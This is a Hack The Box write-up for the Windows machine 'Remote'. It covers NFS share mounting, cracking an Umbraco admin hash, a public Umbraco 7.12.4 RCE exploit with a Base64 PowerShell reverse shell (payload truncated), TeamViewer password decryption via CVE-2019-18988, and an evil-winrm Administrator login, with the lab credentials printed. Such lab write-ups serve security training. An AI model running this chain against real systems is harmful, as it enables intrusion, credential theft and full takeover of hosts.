# Remote

March 07, 2026 · Hack The Box · Created by mrb3n · Difficulty: Easy · OS: Windows

## Enumeration

I began with a full TCP port scan and then ran service and version detection against the open ports it found. `-sS` needs raw sockets, so the first scan runs as root; `/opt/extractports` is a local helper script that pulls the open port list out of the grepable output.

```bash
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.180 -oG scan
/opt/extractports scan
nmap -p21,80,111,135,139,445,2049,5985,47001,49664,49665,49666,49667,49678,49679,49680 -sCV 10.10.10.180 -oN ports
```

## Initial Access (NFS Enumeration)

I focused on NFS (port 2049) first and listed the exports with showmount:

```bash
showmount -e 10.10.10.180
```

The output revealed a critical export: `/site_backups`, accessible by everyone. I mounted it locally (the mount point directory has to exist first):

```bash
sudo mount -t nfs 10.10.10.180:/ ./target-NFS -o nolock
```

## Umbraco Credential Extraction

Inside the mounted share I found `Umbraco.sdf`, the CMS database. The `.sdf` extension is a SQL Server Compact Edition database; rather than loading it, I dumped its readable text with `strings` and searched that for usernames and password hashes:

```bash
strings Umbraco.sdf > cadenas
```

I identified a password hash for the admin account. After cracking it with CrackStation, I had valid credentials:

admin@htb.local : baconandcheese

## Remote Code Execution (RCE)

I used the credentials to log into the Umbraco back office, which identified the application as Umbraco 7.12.4. Searching for public exploits for this version turned up an authenticated Remote Code Execution (RCE) proof of concept on Exploit-DB (ID 49488).

Exploit reference: https://www.exploit-db.com/exploits/49488

I tested the exploit with a harmless command to confirm code execution:

```bash
python3 49488.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell -a 'ls ../../../Users/public/desktop'
```

I then generated a Base64-encoded PowerShell reverse shell payload and executed it through the exploit to get an interactive shell. Note that `powershell -e` expects the script encoded as UTF-16LE before Base64, not UTF-8; a payload produced by running plain `base64` over the script text will not execute.

```bash
python3 49488.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell -a '-e JABjA...'
```

With that shell I read the first flag.
## Privilege Escalation

### TeamViewer Credential Decryption

System enumeration showed that TeamViewer version 7 was installed on the host. TeamViewer 7 stores its passwords in the registry encrypted with AES-128-CBC under a key and IV that are hard-coded in the product (CVE-2019-18988), so any account that can read the registry value can recover the cleartext. I queried the configuration key for sensitive values:

CVE reference: https://community.teamviewer.com/English/discussion/82264/specification-on-cve-2019-18988

```powershell
reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7
```

The output contained the SecurityPasswordAES value, which holds the encrypted password:

```
SecurityPasswordAES    REG_BINARY    FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
```

I fed that value to a public TeamViewer password decryption script to recover the cleartext.

Decryption tool: https://github.com/fuzzlove/TeamViewer-Password-Decrypt/tree/main

The recovered password was: `!R3m0te!`

### Final Access

The TeamViewer password had been reused for the local Administrator account. I validated it with netexec before connecting, then logged in over WinRM as Administrator, completing the privilege escalation:

```bash
netexec winrm 10.10.10.180 -u Administrator -p '!R3m0te!'
evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!'
```

I then read the second (root) flag.